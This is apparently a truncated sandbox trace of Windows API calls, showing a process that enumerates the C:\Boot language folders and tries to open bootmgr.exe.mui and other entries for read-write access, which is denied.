[0084.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887e8 [0084.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887e8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sl-SI") returned 14 [0084.283] CreateFileW (lpFileName="C:\\Boot\\sl-SI" (normalized: "c:\\boot\\sl-si"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.283] GetLastError () returned 0x5 [0084.283] GetLastError () returned 0x5 [0084.283] SetLastError (dwErrCode=0x5) [0084.283] GetLastError () returned 0x5 [0084.283] SetLastError (dwErrCode=0x5) [0084.283] GetLastError () returned 0x5 [0084.283] SetLastError (dwErrCode=0x5) [0084.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.284] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.284] FindFirstFileExW (in: lpFileName="C:\\Boot\\sl-SI\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78610 [0084.284] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.284] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.285] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.285] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.285] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.285] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.285] AreFileApisANSI () returned 1 [0084.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.285] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.285] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.286] AreFileApisANSI () returned 1 [0084.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 30 [0084.286] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.286] GetFileType (hFile=0x348) returned 0x1 [0084.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.286] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.286] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.301] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.301] CloseHandle (hObject=0x348) returned 1 [0084.311] AreFileApisANSI () returned 1 [0084.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52fc8 [0084.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x52fc8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 30 [0084.319] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.319] GetLastError () returned 0x5 [0084.319] GetLastError () returned 0x5 [0084.319] SetLastError (dwErrCode=0x5) [0084.319] GetLastError () returned 0x5 [0084.319] SetLastError (dwErrCode=0x5) [0084.319] GetLastError () returned 0x5 [0084.319] SetLastError (dwErrCode=0x5) [0084.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.319] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⭠\x01⺊Ā")) returned 0 [0084.319] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0084.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0084.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0084.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0084.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.321] AreFileApisANSI () returned 1 [0084.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-CS", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-CS", lpUsedDefaultChar=0x0) returned 19 [0084.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.321] AreFileApisANSI () returned 1 [0084.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0084.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7aae8 [0084.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7aae8, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS") returned 19 [0084.321] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS" (normalized: "c:\\boot\\sr-latn-cs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.321] GetLastError () returned 0x5 [0084.321] GetLastError () returned 0x5 [0084.321] SetLastError (dwErrCode=0x5) [0084.321] GetLastError () returned 0x5 [0084.321] SetLastError (dwErrCode=0x5) [0084.321] GetLastError () returned 0x5 [0084.321] SetLastError (dwErrCode=0x5) [0084.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aae8 | out: hHeap=0x20000) returned 1 [0084.322] AreFileApisANSI () returned 1 [0084.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7ac38 [0084.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS") returned 19 [0084.322] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS" (normalized: "c:\\boot\\sr-latn-cs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.322] GetLastError () returned 0x5 [0084.322] GetLastError () returned 0x5 [0084.322] SetLastError (dwErrCode=0x5) [0084.322] GetLastError () returned 0x5 [0084.322] SetLastError (dwErrCode=0x5) [0084.322] GetLastError () returned 0x5 [0084.322] SetLastError (dwErrCode=0x5) [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0084.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.322] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.323] FindFirstFileExW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0084.323] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.323] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, 